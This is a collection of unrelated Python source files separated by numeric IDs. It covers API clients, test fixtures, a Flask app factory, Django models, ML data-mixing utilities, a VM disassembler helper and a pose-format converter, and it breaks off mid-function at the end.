def remove_control_chars(s):
    ctl_list = list(range(0, 32)) + list(range(127, 160))
    # keep \n (10) and \r (13)
    ctl_list.remove(10)
    ctl_list.remove(13)
    control_chars = ''.join(map(chr, ctl_list))
    control_char_re = re.compile('[%s]' % re.escape(control_chars))
    return control_char_re.sub('', s)
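# --- usage sketch (illustrative addition, not part of the original file) ---
# Control characters such as \x00 and \x1b are stripped, while \n survives.
if __name__ == '__main__':
    dirty = 'hello\x00 world\x1b\nnext line'
    print(repr(remove_control_chars(dirty)))  # 'hello world\nnext line'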
11569865
import requests
from functools import wraps

from .auth import OAuth
from . import endpoints


class Client:
    prefix = 'https://api.spotify.com/v1'
    api = endpoints     # So static analysis is useful

    def __init__(self, auth: OAuth, requests_session=None):
        self.session = requests_session or requests.Session()
        self.auth = auth

        class Api:
            pass
        self.api = Api()    # So endpoints module is not modified
        self.api.request = self.request

        for name, member in endpoints.__dict__.items():
            if name.startswith('_'):
                continue
            method = self._build_request(member)
            setattr(self.api, name, method)

    def _build_request(self, func):
        # Takes endpoint functions and performs actual requests
        @wraps(func)
        def wrapper(*args, **kwargs):
            return self.request(**func(*args, **kwargs))
        return wrapper

    def headers(self):
        return {'Authorization': 'Bearer ' + self.auth.token['access_token']}

    def request(self, method, url, params=None, payload=None, data=None,
                additional_headers=None):
        if additional_headers is None:
            additional_headers = {}

        url = url if url.startswith('http') else self.prefix + url
        headers = {**self.headers(), **additional_headers}

        response = self.session.request(
            method, url,
            params=params,
            json=payload,
            headers=headers,
            data=data
        )
        response.raise_for_status()

        if not response.text:
            return
        return response.json()
11569886
class VM_Disassembler:
    def __init__(self, code, disassembler, entry_point, look_ahead_len=0):
        # code is a list of ints
        self.code = code
        # this is the core disassembler function
        # the user needs to write it
        self.disassembler = disassembler
        self.entry_point = entry_point
        # how many bytes to check when disassembling the current instruction
        # this can be set to the max length of an instruction
        # leave it to 0 if unsure
        self.look_ahead_len = look_ahead_len
        # the set of addresses that we have already processed
        self.disassembled_addr = set()
        # the list of addresses to process
        self.disassemble_queue = [self.entry_point]

    # utility
    def format_bytes(self, data):
        s = ''
        for c in data:
            s += '%02x' % c
        return s

    # the core function for the recursive disassembly
    def disassemble(self):
        # check whether we have addresses to disassemble
        while len(self.disassemble_queue) > 0:
            addr = self.disassemble_queue.pop()
            if addr in self.disassembled_addr:
                continue
            else:
                self.disassembled_addr.add(addr)
            if addr >= len(self.code):
                # there is probably an error in the disassembler
                # but for now we just ignore it
                continue
            # prepare the data and send it to self.disassembler()
            if self.look_ahead_len == 0:
                data_to_parse = self.code[addr:]
            else:
                data_to_parse = self.code[addr: addr + self.look_ahead_len]
            instr_len, instr_text, possible_next_instrs = \
                self.disassembler(addr, data_to_parse)
            # put every possible next address into the queue
            for next_addr in possible_next_instrs:
                self.disassemble_queue.append(next_addr)
            # print the address, raw bytes, and the disassembly text of the current instruction
            instr_bytes = self.code[addr: addr + instr_len]
            print('0x%x %s %s' % (addr, self.format_bytes(instr_bytes), instr_text))
        print('Parsing done! Good luck with reversing')
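# --- usage sketch (illustrative addition, not part of the original file) ---
# The callback contract assumed by VM_Disassembler.disassemble(): it receives
# (addr, data) and returns (instr_len, instr_text, possible_next_instrs).
# The toy VM below (0x00 = nop, 0x01 imm8 = jmp, 0xff = halt) is made up for
# illustration; note how the bytes after the jump target are never visited.
def toy_disassembler(addr, data):
    op = data[0]
    if op == 0x00:
        return 1, 'nop', [addr + 1]
    if op == 0x01:
        target = data[1]
        return 2, 'jmp 0x%x' % target, [target]   # unconditional jump
    if op == 0xff:
        return 1, 'halt', []                      # no successors
    return 1, 'db 0x%02x' % op, [addr + 1]        # unknown byte


if __name__ == '__main__':
    code = [0x00, 0x01, 0x05, 0xff, 0x00, 0x00, 0xff]
    VM_Disassembler(code, toy_disassembler, entry_point=0).disassemble()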
11569940
from .. import utils as test_utils

teamocil_yaml = test_utils.read_config_file("config_teamocil/test2.yaml")

teamocil_dict = {
    "windows": [
        {
            "name": "sample-four-panes",
            "root": "~/Code/sample/www",
            "layout": "tiled",
            "panes": [{"cmd": "pwd"}, {"cmd": "pwd"}, {"cmd": "pwd"}, {"cmd": "pwd"}],
        }
    ]
}

expected = {
    "session_name": None,
    "windows": [
        {
            "window_name": "sample-four-panes",
            "layout": "tiled",
            "start_directory": "~/Code/sample/www",
            "panes": [
                {"shell_command": "pwd"},
                {"shell_command": "pwd"},
                {"shell_command": "pwd"},
                {"shell_command": "pwd"},
            ],
        }
    ],
}
11569953
import os

from dotenv import load_dotenv
from flask import Flask, jsonify

load_dotenv()


def create_app():
    app = Flask(__name__, static_folder="./../dist/static")
    app.config.from_object(os.getenv("APP_SETTINGS"))
    app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False

    register_extensions(app)
    register_blueprints(app)

    return app


def register_extensions(app):
    from server.extensions import (
        db,
        migrate,
        mail,
        babel,
        cors,
        jwt,
        cache,
        compress,
    )

    db.init_app(app)
    migrate.init_app(app, db)
    mail.init_app(app)
    babel.init_app(app)
    cors.init_app(
        app, resources={r"/api/*": {"origins": "*"}}, supports_credentials=True
    )
    jwt.init_app(app)
    cache.init_app(app)
    compress.init_app(app)

    # Return validation errors as JSON
    @app.errorhandler(422)
    @app.errorhandler(400)
    def handle_error(err):
        # `err.data` is only set on webargs validation errors; fall back to a
        # generic message instead of indexing into a plain string
        messages = getattr(err, "data", {}).get("messages", {})
        return jsonify({"message": messages.get("json", "Invalid request.")}), 400


def register_blueprints(app):
    from server.views import blueprints
    from server.client import client_bp

    for blueprint in blueprints:
        app.register_blueprint(blueprint.bp)

    if app.config.get("SHOULD_PROXY", False):
        app.register_blueprint(client_bp)
11569967
import numpy as np
import logging

from FixedBase import FixedBase


class FixedPredict(FixedBase):

    def __init__(self, iterations=1):
        super().__init__(iterations)

    def predict(self, X, feature_names):
        return self.work()
11569991
from __future__ import unicode_literals
from frappe import _


def get_data():
    return [
        {
            "label": _("Web Site"),
            "items": [
                {
                    "type": "doctype",
                    "name": "Website Info",
                    "description": _("Website Info"),
                }
            ]
        }
    ]
11570035
import unittest

from twstock.proxy import get_proxies, configure_proxy_provider, reset_proxy_provider
from twstock.proxy import SingleProxyProvider
from twstock.proxy import RoundRobinProxiesProvider


class ProxyProviderTest(unittest.TestCase):
    def setUp(self):
        reset_proxy_provider()

    def tearDown(self):
        reset_proxy_provider()

    def test_configure(self):
        # default values are empty
        self.assertDictEqual({}, get_proxies())

        # configure fake proxy
        configure_proxy_provider(
            SingleProxyProvider(dict(http="http-proxy", https="https-proxy")))
        self.assertEqual("http-proxy", get_proxies()['http'])
        self.assertEqual("https-proxy", get_proxies()['https'])

        # reset proxy
        reset_proxy_provider()
        self.assertDictEqual({}, get_proxies())

    def test_rr_proxies_provider(self):
        proxies = ['a', 'b', 'c']
        rr_provider = RoundRobinProxiesProvider(proxies)

        for _ in range(3):
            for p in proxies:
                self.assertEqual(rr_provider.get_proxy(), p)

        proxies = ['d', 'e', 'f']
        rr_provider.proxies = proxies
        for _ in range(3):
            for p in proxies:
                self.assertEqual(rr_provider.get_proxy(), p)
11570039
import io
import logging
import sys
from contextlib import contextmanager

from test_junkie.decorators import synchronized


class LogJunkie:

    __LOGGER = None
    __ENABLED = False
    __PRIORITY = logging.ERROR
    __NAME = "TestJunkieLogger"
    __FORMAT = "%(asctime)s [%(levelname)s] (%(filename)s, %(funcName)s(), %(lineno)d - %(threadName)s) :: %(message)s"

    @staticmethod
    def enable_logging(level):
        LogJunkie.__ENABLED = True
        LogJunkie.__PRIORITY = level

    @staticmethod
    def disable_logging():
        LogJunkie.__ENABLED = False

    @staticmethod
    @synchronized()
    def __get_logger():
        if LogJunkie.__LOGGER is None:
            stderr_handler = logging.StreamHandler()
            stderr_handler.setFormatter(logging.Formatter(LogJunkie.__FORMAT))
            LogJunkie.__LOGGER = logging.getLogger(LogJunkie.__NAME)
            LogJunkie.__LOGGER.addHandler(stderr_handler)
            LogJunkie.__LOGGER.setLevel(LogJunkie.__PRIORITY)
        return LogJunkie.__LOGGER

    @staticmethod
    def info(msg):
        if LogJunkie.__ENABLED:
            LogJunkie.__get_logger().info(msg)

    @staticmethod
    def debug(msg):
        if LogJunkie.__ENABLED:
            LogJunkie.__get_logger().debug(msg)

    @staticmethod
    def error(msg, exc_info=False):
        if LogJunkie.__ENABLED:
            LogJunkie.__get_logger().error(msg, exc_info=exc_info)

    @staticmethod
    def warn(msg):
        if LogJunkie.__ENABLED:
            LogJunkie.__get_logger().warning(msg)


@contextmanager
def suppressed_stdout(suppress=False):
    if suppress:
        original_stdout = sys.stdout
        if sys.version_info[0] < 3:
            sys.stdout = io.BytesIO()   # works with python 2
        else:
            sys.stdout = io.StringIO()  # works with python 3
        original_level = logging.root.manager.disable
        logging.disable(logging.ERROR)
        try:
            yield
        finally:
            sys.stdout = original_stdout
            logging.disable(original_level)
    else:
        yield
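# --- usage sketch (illustrative addition, not part of the original file) ---
# Enable framework logging at DEBUG level, then mute a noisy section: inside
# suppressed_stdout(True), stdout is redirected and logging.disable(ERROR)
# mutes every record at ERROR level or below.
if __name__ == '__main__':
    LogJunkie.enable_logging(logging.DEBUG)
    LogJunkie.debug('visible on stderr')
    with suppressed_stdout(suppress=True):
        print('swallowed')                 # stdout is redirected
        LogJunkie.error('also swallowed')  # records <= ERROR are disabled here
    print('visible again')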
11570080
from copy import copy
import os

from schemer import ValidationException

from ..compiler.spec_assembler import get_specs_path, get_specs_from_path
from ..log import log_to_client
from ..schemas import app_schema, bundle_schema, lib_schema
from ..schemas.base_schema_class import notifies_validation_exception
from .. import constants
from ..payload import daemon_command


def _check_bare_minimum(specs):
    if not specs.get('bundles'):
        raise ValidationException("No Bundles found - exiting")


@notifies_validation_exception
def _validate_app_references(app, specs):
    for spec_type in ['apps', 'libs', 'services']:
        dependent = app['depends'][spec_type]
        if spec_type in ['apps', 'services']:
            dependent += app['conditional_links'][spec_type]
        not_present = set(dependent) - set(specs[spec_type].keys())
        if not_present:
            raise ValidationException('{} {} are not present in your specs'.format(
                spec_type, ', '.join(not_present)))


@notifies_validation_exception
def _validate_bundle_references(bundle, specs):
    not_present = set(bundle['apps']) - set(specs['apps'].keys())
    if not_present:
        raise ValidationException('Apps {} are not present in your specs'.format(
            ', '.join(not_present)))


@notifies_validation_exception
def _validate_lib_references(lib, specs):
    not_present = set(lib['depends']['libs']) - set(specs['libs'].keys())
    if not_present:
        raise ValidationException('Libs {} are not present in your specs'.format(
            ', '.join(not_present)))


def _check_nginx_name_conflict(specs):
    apps = set(specs['apps'].keys())
    services = set(specs['services'].keys())
    if constants.DUSTY_NGINX_NAME in apps.union(services):
        raise ValidationException("The name {} is reserved for use by Dusty's internal nginx"
                                  " - please choose a different name".format(constants.DUSTY_NGINX_NAME))


def _check_name_overlap(specs):
    apps = set(specs['apps'].keys())
    libs = set(specs['libs'].keys())
    services = set(specs['services'].keys())
    app_service_overlap = apps.intersection(services)
    if app_service_overlap:
        raise ValidationException('Apps and services cannot share names: {}'.format(app_service_overlap))
    app_lib_overlap = apps.intersection(libs)
    if app_lib_overlap:
        raise ValidationException('Apps and libs cannot share names: {}'.format(app_lib_overlap))
    service_lib_overlap = services.intersection(libs)
    if service_lib_overlap:
        raise ValidationException('Services and libs cannot share names: {}'.format(service_lib_overlap))


def _validate_spec_names(specs):
    _check_name_overlap(specs)
    _check_nginx_name_conflict(specs)
    for app in specs['apps'].values():
        _validate_app_references(app, specs)
    for bundle in specs['bundles'].values():
        _validate_bundle_references(bundle, specs)
    for lib in specs['libs'].values():
        _validate_lib_references(lib, specs)


def _cycle_check(spec, specs, upstream):
    for dependent in spec['depends'][spec.spec_type]:
        if dependent in upstream:
            raise ValidationException("Cycle found for {0} {1}. Upstream: {2}".format(
                spec.type_singular, spec.name, upstream))
        else:
            new_upstream = copy(upstream)
            new_upstream.add(dependent)
            _cycle_check(specs[spec.spec_type][dependent], specs, new_upstream)


def _validate_cycle_free(specs):
    for spec_type in ['apps', 'libs']:
        for spec in specs[spec_type].values():
            _cycle_check(spec, specs, set([spec.name]))


def validate_specs_from_path(specs_path):
    """ Validates Dusty specs at the given path. The following checks are performed:
     - That the given path exists
     - That there are bundles in the given path
     - That the fields in the specs match those allowed in our schemas
     - That references to apps, libs, and services point at defined specs
     - That there are no cycles in app and lib dependencies
    """
    # Validation of fields with schemer is now done implicitly through get_specs_from_path.
    # We are dealing with the Dusty_Specs class in this file.
    log_to_client("Validating specs at path {}".format(specs_path))
    if not os.path.exists(specs_path):
        raise RuntimeError("Specs path not found: {}".format(specs_path))
    specs = get_specs_from_path(specs_path)
    _check_bare_minimum(specs)
    _validate_spec_names(specs)
    _validate_cycle_free(specs)
    log_to_client("Validation Complete!")


@daemon_command
def validate_specs():
    """ Validates specs using the path configured in Dusty's configuration """
    validate_specs_from_path(get_specs_path())
11570141
from transformers import T5ForConditionalGeneration, T5Tokenizer

# initialize the model architecture and weights
model = T5ForConditionalGeneration.from_pretrained("t5-base")
# initialize the model tokenizer
tokenizer = T5Tokenizer.from_pretrained("t5-base")

article = """
<NAME> and <NAME>, welcome to parenthood.
The celebrity couple announced the arrival of their son, <NAME>, in statements
to People. "Silas was the middle name of Timberlake's maternal grandfather
<NAME>, who died in 2012, while Randall is the musician's own middle name, as
well as his father's first," People reports. The couple announced the pregnancy
in January, with an Instagram post. It is the first baby for both.
"""

# encode the text into tensor of integers using the appropriate tokenizer
inputs = tokenizer.encode("summarize: " + article, return_tensors="pt",
                          max_length=512, truncation=True)

# generate the summarization output
outputs = model.generate(
    inputs,
    max_length=150,
    min_length=40,
    length_penalty=2.0,
    num_beams=4,
    early_stopping=True)
# just for debugging
print(outputs)
print(tokenizer.decode(outputs[0]))
11570204
from django.db import models


class Author(models.Model):
    name = models.CharField(max_length=250)
    nickname = models.CharField(max_length=100)


class Book(models.Model):
    title = models.CharField(max_length=200)
    description = models.TextField()
    publication_date = models.DateField()
    isbn = models.CharField(max_length=17)
    # on_delete is required on ForeignKey since Django 2.0
    author = models.ForeignKey(Author, on_delete=models.CASCADE)
11570209
import os
import time

import numpy as np

from airobot import Robot
from airobot.utils.common import euler2quat
from airobot.utils.pb_util import TextureModder


def main():
    """
    This function demonstrates how to load objects into the scene and
    randomize their visual textures with a TextureModder.
    """
    dir_path = os.path.dirname(os.path.realpath(__file__))
    texture_path = os.path.join(dir_path, 'textures')
    robot = Robot('ur5e')
    robot.arm.go_home()
    modder = TextureModder(pb_client_id=robot.pb_client.get_client_id())

    ori = euler2quat([0, 0, np.pi / 2])
    table_id = robot.pb_client.load_urdf('table/table.urdf',
                                         [1, 0, 0.4],
                                         ori,
                                         scaling=0.9)
    sphere_id = robot.pb_client.load_geom('sphere', size=0.05, mass=1,
                                          base_pos=[1, 0, 1.0],
                                          rgba=[0, 1, 0, 1])
    box_id = robot.pb_client.load_geom('box', size=0.05, mass=1,
                                       base_pos=[1, 0.12, 1.0],
                                       rgba=[1, 0, 0, 1])
    duck_id = robot.pb_client.load_geom('mesh', mass=1,
                                        visualfile='duck.obj',
                                        mesh_scale=0.1,
                                        base_pos=[0.9, -0.4, 1.0],
                                        rgba=[0.5, 0.2, 1, 1])

    modder.set_texture(table_id, -1, os.path.join(texture_path, '1.jpg'))
    modder.set_texture(sphere_id, -1, os.path.join(texture_path, '2.jpg'))
    modder.set_texture(box_id, -1, os.path.join(texture_path, '3.jpg'))
    modder.set_texture(duck_id, -1, os.path.join(texture_path, '4.jpg'))
    modder.set_texture_path(texture_path)

    while True:
        start = time.time()
        # modder.randomize('rgb')
        # modder.randomize('gradient')
        # modder.randomize('noise')
        # modder.randomize('texture', exclude={robot.arm.robot_id: []})
        # modder.randomize('texture',
        #                  exclude={robot.arm.robot_id: [3, 4, 5, 6]})
        modder.randomize('all')
        print('Time cost (s): ', time.time() - start)
        time.sleep(1)


if __name__ == '__main__':
    main()
11570223
import numpy as np
import torch


def mixup_vae_data(image, z_mean, z_log_sigma, disc_log_alpha, optimal_match=True):
    '''Returns mixed inputs, pairs of targets, and lambda'''
    lam = np.random.beta(2.0, 2.0)
    batch_size = image.size()[0]
    if optimal_match:
        # use the optimal match to provide match index
        with torch.no_grad():
            kl_metric = torch.zeros(batch_size, batch_size)
            for i in range(batch_size):
                for j in range(batch_size):
                    kl_metric[i, j] = gaussian_kl_divergence_calculation(
                        z_mean[i, ...], z_log_sigma[i, ...],
                        z_mean[j, ...], z_log_sigma[j, ...])
            index = torch.argmin(kl_metric, dim=1)
    else:
        # use random permutation to provide match index
        index = torch.randperm(batch_size).cuda()
    mixed_image = lam * image + (1 - lam) * image[index, :]
    mixed_z_mean = lam * z_mean + (1 - lam) * z_mean[index]
    mixed_z_sigma = lam * torch.exp(z_log_sigma) + (1 - lam) * torch.exp(z_log_sigma[index])
    mixed_disc_alpha = lam * torch.exp(disc_log_alpha) + (1 - lam) * torch.exp(disc_log_alpha[index])
    return mixed_image, mixed_z_mean, mixed_z_sigma, mixed_disc_alpha, lam


def label_smoothing(image, z_mean, z_log_sigma, disc_log_alpha, epsilon=0.1, disc_label=None):
    if epsilon > 0:
        lam = np.random.beta(epsilon, epsilon)
    else:
        lam = 1
    batch_size = image.size()[0]
    index = torch.randperm(batch_size).cuda()
    smoothed_image = lam * image + (1 - lam) * image[index, :]
    smoothed_z_mean = lam * z_mean + (1 - lam) * z_mean[index]
    smoothed_z_sigma = lam * torch.exp(z_log_sigma) + (1 - lam) * torch.exp(z_log_sigma[index])
    smoothed_disc_alpha = lam * torch.exp(disc_log_alpha) + (1 - lam) * torch.exp(disc_log_alpha[index])
    # guard against the default disc_label=None, which is not indexable
    smoothed_disc_label = disc_label[index] if disc_label is not None else None
    return smoothed_image, smoothed_z_mean, smoothed_z_sigma, smoothed_disc_alpha, smoothed_disc_label, lam


def mixup_raw_labeled_data(image, label, label_weight, alpha=1.0, use_cuda=True):
    '''Returns mixed inputs, pairs of targets, and lambda'''
    if alpha > 0:
        lam = np.random.beta(alpha, alpha)
    else:
        lam = 1
    batch_size = image.size()[0]
    if use_cuda:
        index = torch.randperm(batch_size).cuda()
    else:
        index = torch.randperm(batch_size)
    mixed_image = lam * image + (1 - lam) * image[index, :]
    label_a, label_b = label, label[index]
    label_weight_a, label_weight_b = label_weight, label_weight[index]
    return mixed_image, label_a, label_b, label_weight_a, label_weight_b, lam


def mixup_criterion(criterion, prediction, label_a, label_b, lam):
    """
    :param criterion: the cross entropy criterion
    :param prediction: y_pred
    :param label_a: label = lam * label_a + (1-lam) * label_b
    :param label_b: label = lam * label_a + (1-lam) * label_b
    :param lam: label = lam * label_a + (1-lam) * label_b
    :return: cross_entropy(pred, label)
    """
    return lam * criterion(label_a, prediction) + (1 - lam) * criterion(label_b, prediction)


def mixup_data(image, label, alpha=1.0, use_cuda=True):
    '''Returns mixed inputs, pairs of targets, and lambda'''
    if alpha > 0:
        lam = np.random.beta(alpha, alpha)
    else:
        lam = 1
    batch_size = image.size()[0]
    if use_cuda:
        index = torch.randperm(batch_size).cuda()
    else:
        index = torch.randperm(batch_size)
    mixed_image = lam * image + (1 - lam) * image[index, :]
    label_a, label_b = label, label[index]
    return mixed_image, label_a, label_b, lam


def gaussian_kl_divergence_calculation(z_mean_1, z_log_sigma_1, z_mean_2, z_log_sigma_2):
    dim = z_mean_1.size(0)
    z_sigma_1 = torch.exp(z_log_sigma_1)
    z_sigma_2 = torch.exp(z_log_sigma_2)
    kl_1_2 = torch.sum(z_log_sigma_2 - z_log_sigma_1) \
        + 0.5 * torch.sum(z_sigma_1 ** 2 / z_sigma_2 ** 2) \
        + 0.5 * torch.sum((z_mean_1 - z_mean_2) ** 2 / (z_sigma_2 ** 2)) \
        - 0.5 * dim
    return kl_1_2
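# --- usage sketch (illustrative addition, not part of the original file) ---
# One training step with input mixup. Note that mixup_criterion above calls
# criterion(label, prediction), i.e. target-first, so the wrapped loss must
# accept that argument order; the lambda below adapts F.cross_entropy.
# The tiny model and shapes are assumptions for illustration.
import torch.nn.functional as F

if __name__ == '__main__':
    model = torch.nn.Linear(32, 10)
    image = torch.randn(8, 32)
    label = torch.randint(0, 10, (8,))

    mixed, y_a, y_b, lam = mixup_data(image, label, alpha=1.0, use_cuda=False)
    pred = model(mixed)
    criterion = lambda target, prediction: F.cross_entropy(prediction, target)
    loss = mixup_criterion(criterion, pred, y_a, y_b, lam)
    loss.backward()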
11570230
from base64 import b64encode

from asgi_webdav.constants import DAVPath, DAVUser
from asgi_webdav.config import update_config_from_obj, get_config
from asgi_webdav.auth import DAVAuth
from asgi_webdav.request import DAVRequest

config_data = {
    "account_mapping": [
        {"username": "user1", "password": "<PASSWORD>", "permissions": list()}
    ]
}

basic_authorization = b"Basic " + b64encode(
    "{}:{}".format("user1", "pass1").encode("utf-8")
)
basic_authorization_bad = b"Basic bad basic_authorization"


def fake_call():
    pass


request = DAVRequest(
    {"method": "GET", "headers": {b"authorization": b"placeholder"}, "path": "/"},
    fake_call,
    fake_call,
)


def test_basic_access_authentication():
    update_config_from_obj(config_data)
    dav_auth = DAVAuth(get_config())

    request.headers.update(
        {
            b"authorization": basic_authorization,
        }
    )
    account, message = dav_auth.pick_out_user(request)
    print(basic_authorization)
    print(dav_auth.basic_auth.credential_user_mapping)
    print(account)
    print(message)
    assert isinstance(account, DAVUser)

    request.headers.update(
        {
            b"authorization": basic_authorization_bad,
        }
    )
    account, message = dav_auth.pick_out_user(request)
    print(account)
    print(message)
    assert account is None


def test_verify_permission():
    username = "user1"
    password = "<PASSWORD>"
    admin = False

    # "+"
    permissions = ["+^/aa"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert not dav_user.check_paths_permission([DAVPath("/a")])
    assert dav_user.check_paths_permission([DAVPath("/aa")])
    assert dav_user.check_paths_permission([DAVPath("/aaa")])

    permissions = ["+^/bbb"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert not dav_user.check_paths_permission([DAVPath("/aaa")])

    # "-"
    permissions = ["-^/aaa"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert not dav_user.check_paths_permission([DAVPath("/aaa")])

    # "$"
    permissions = ["+^/a$"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert dav_user.check_paths_permission([DAVPath("/a")])
    assert not dav_user.check_paths_permission([DAVPath("/ab")])
    assert not dav_user.check_paths_permission([DAVPath("/a/b")])

    # multi-rules
    permissions = ["+^/a$", "+^/a/b"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert dav_user.check_paths_permission([DAVPath("/a")])
    assert dav_user.check_paths_permission([DAVPath("/a/b")])

    permissions = ["+^/a$", "+^/a/b", "-^/a/b/c"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert dav_user.check_paths_permission([DAVPath("/a")])
    assert dav_user.check_paths_permission([DAVPath("/a/b")])
    assert not dav_user.check_paths_permission([DAVPath("/a/b/c")])

    permissions = ["+^/a$", "+^/a/b1", "-^/a/b2"]
    dav_user = DAVUser(username, password, permissions, admin)
    assert dav_user.check_paths_permission([DAVPath("/a")])
    assert dav_user.check_paths_permission([DAVPath("/a/b1")])
    assert not dav_user.check_paths_permission([DAVPath("/a/b2")])
11570239
from typing import List

import spacy
from fastapi import FastAPI
from pydantic import BaseModel

import edsnlp

app = FastAPI(title="EDS-NLP", version=edsnlp.__version__)

nlp = spacy.blank("eds")
nlp.add_pipe("eds.sentences")

config = dict(
    regex=dict(
        covid=[
            "covid",
            r"covid[-\s]?19",
            r"sars[-\s]?cov[-\s]?2",
            r"corona[-\s]?virus",
        ],
    ),
    attr="LOWER",
)
nlp.add_pipe("eds.matcher", config=config)

nlp.add_pipe("eds.negation")
nlp.add_pipe("eds.family")
nlp.add_pipe("eds.hypothesis")
nlp.add_pipe("eds.reported_speech")


class Entity(BaseModel):  # (2)
    # OMOP-style attributes
    start: int
    end: int
    label: str
    lexical_variant: str
    normalized_variant: str

    # Qualifiers
    negated: bool
    hypothesis: bool
    family: bool
    reported_speech: bool


class Document(BaseModel):  # (1)
    text: str
    ents: List[Entity]


@app.post("/process", response_model=List[Document])  # (1)
async def process(
    notes: List[str],  # (2)
):
    documents = []

    for doc in nlp.pipe(notes):
        entities = []

        for ent in doc.ents:
            entity = Entity(
                start=ent.start_char,
                end=ent.end_char,
                label=ent.label_,
                lexical_variant=ent.text,
                normalized_variant=ent._.normalized_variant,
                negated=ent._.negation,
                hypothesis=ent._.hypothesis,
                family=ent._.family,
                reported_speech=ent._.reported_speech,
            )
            entities.append(entity)

        documents.append(
            Document(
                text=doc.text,
                ents=entities,
            )
        )

    return documents
11570257
import Pyro5.api
import Pyro5.core
import Pyro5.client
import Pyro5.server
import Pyro5.nameserver
import Pyro5.callcontext
import Pyro5.serializers
from Pyro5.serializers import SerializerBase


def test_api():
    assert hasattr(Pyro5.api, "__version__")
    assert Pyro5.api.config.SERIALIZER == "serpent"
    assert Pyro5.api.URI is Pyro5.core.URI
    assert Pyro5.api.Proxy is Pyro5.client.Proxy
    assert Pyro5.api.Daemon is Pyro5.server.Daemon
    assert Pyro5.api.start_ns is Pyro5.nameserver.start_ns
    assert Pyro5.api.current_context is Pyro5.callcontext.current_context
    assert Pyro5.api.register_dict_to_class == SerializerBase.register_dict_to_class
    assert Pyro5.api.register_class_to_dict == SerializerBase.register_class_to_dict
    assert Pyro5.api.unregister_dict_to_class == SerializerBase.unregister_dict_to_class
    assert Pyro5.api.unregister_class_to_dict == SerializerBase.unregister_class_to_dict
11570266
from setuptools import setup, find_packages
import glob
import zhuaxia.zxver as zxver

setup(
    name='zhuaxia',
    version=zxver.version,
    install_requires=['pycrypto', 'requests', 'mutagen', 'beautifulsoup4'],
    packages=find_packages(),
    package_data={'zhuaxia': ['conf/default.*']},
    # data_files=[('conf', glob.glob('conf/*.*'))],
    include_package_data=True,
    zip_safe=False,
    scripts=['zx'],
    author='<NAME>',
    author_email='<EMAIL>',
    platforms=['POSIX'],
    keywords='xiami mp3 download',
    url='https://github.com/sk1418/zhuaxia',
    description='a cli tool to download mp3 from xiami.com and music.163',
    long_description="""
    a cli tool to download mp3 from xiami.com and music.163
    """,
)
11570292
import requests

from bgmi import config
from bgmi.plugin.download import BaseDownloadService, DownloadStatus, RpcError


class DelugeRPC(BaseDownloadService):
    def __init__(self):
        self._id = 0
        self._session = requests.session()
        self._call("auth.login", [config.DELUGE_RPC_PASSWORD])

    @staticmethod
    def check_config() -> None:
        pass

    @staticmethod
    def check_dep():
        pass

    def get_status(self, id: str) -> DownloadStatus:
        status = self._call("web.get_torrent_status", [id, ["state"]])
        return {
            "Error": DownloadStatus.error,
            "Downloading": DownloadStatus.downloading,
            "Paused": DownloadStatus.not_downloading,
            "Seeding": DownloadStatus.done,
        }.get(status["state"], DownloadStatus.error)

    def add_download(self, url: str, save_path: str):
        options = {
            "add_paused": False,
            "move_completed": False,
            "download_location": save_path,
        }
        e = self._call("core.add_torrent_url", [url, options])
        return e

    def _call(self, methods, params=None):
        if params is None:
            params = []
        r = self._session.post(
            config.DELUGE_RPC_URL,
            headers={"Content-Type": "application/json"},
            json={"method": methods, "params": params, "id": self._id},
            timeout=10,
        )
        self._id += 1
        e = r.json()
        if "result" not in e:
            raise RpcError("deluge error, reason: {}".format(e["error"]["message"]))
        return e["result"]
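# --- usage sketch (illustrative addition, not part of the original file) ---
# Assumes config.DELUGE_RPC_URL / DELUGE_RPC_PASSWORD point at a running
# deluge-web instance; the torrent URL and save path are placeholders.
if __name__ == '__main__':
    client = DelugeRPC()
    torrent_id = client.add_download('http://example.com/episode.torrent',
                                     save_path='/downloads/bgmi')
    print(client.get_status(torrent_id))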
11570302
from tests.helm_template_generator import render_chart
import pytest
import yaml

from . import git_root_dir

with open(f"{git_root_dir}/tests/default_chart_data.yaml") as file:
    default_chart_data = yaml.load(file, Loader=yaml.SafeLoader)

template_ids = [template["name"] for template in default_chart_data]


@pytest.mark.parametrize("template", default_chart_data, ids=template_ids)
def test_default_chart_with_basedomain(template):
    """Test that each template used with just baseDomain set renders."""
    docs = render_chart(
        show_only=[template["name"]],
    )
    assert len(docs) == template["length"]
11570348
import numpy as np


class DataFormatConverter:

    def __init__(self, pose_config_source, pose_config_target):
        self.pose_config_source = pose_config_source
        self.pose_config_target = pose_config_target
        self.num_source_kpts = len(self.pose_config_source['KEYPOINT_NAMES'])
        self.num_target_kpts = len(self.pose_config_target['KEYPOINT_NAMES'])

        # assert that all keypoints in target are contained in source
        self.index_map = []
        err_str = "Bad data formats. All target keypoints must be in source!"
        for k in self.pose_config_target['KEYPOINT_NAMES']:
            assert k in self.pose_config_source['KEYPOINT_NAMES'], err_str
            self.index_map.append(self.pose_config_source['KEYPOINT_NAMES'].index(k))

    def source_to_target(self, source_pose_array, dim=2):
        if len(source_pose_array.shape) == 1:
            len_arrays = len(source_pose_array)
            num_arrays = 1
            source_pose_array = source_pose_array[np.newaxis, ...]
        else:
            num_arrays, len_arrays = source_pose_array.shape
        err_str = "Bad input. Array doesn't match source data format length."
        assert len_arrays == self.num_source_kpts * dim, err_str

        # transform an array in the source format to the target format
        if dim == 1:
            return source_pose_array[:, self.index_map]
        else:
            t_x = source_pose_array[:, 0::dim][:, self.index_map]
            t_y = source_pose_array[:, 1::dim][:, self.index_map]
            if dim == 3:
                t_z = source_pose_array[:, 2::dim][:, self.index_map]
                target_pose_array = np.vstack((t_x, t_y, t_z)).reshape(
                    (-1, self.num_target_kpts * dim), order='F')
            elif dim == 2:
                target_pose_array = np.vstack((t_x, t_y)).reshape(
                    (-1, self.num_target_kpts * dim), order='F')
            else:
                raise ValueError("Dimension has to be one of: [1,2,3].")
        return target_pose_array

    def target_to_source(self, target_pose_array, dim=2):
        if len(target_pose_array.shape) == 1:
            len_arrays = len(target_pose_array)
            num_arrays = 1
            target_pose_array = target_pose_array[np.newaxis, ...]
        else:
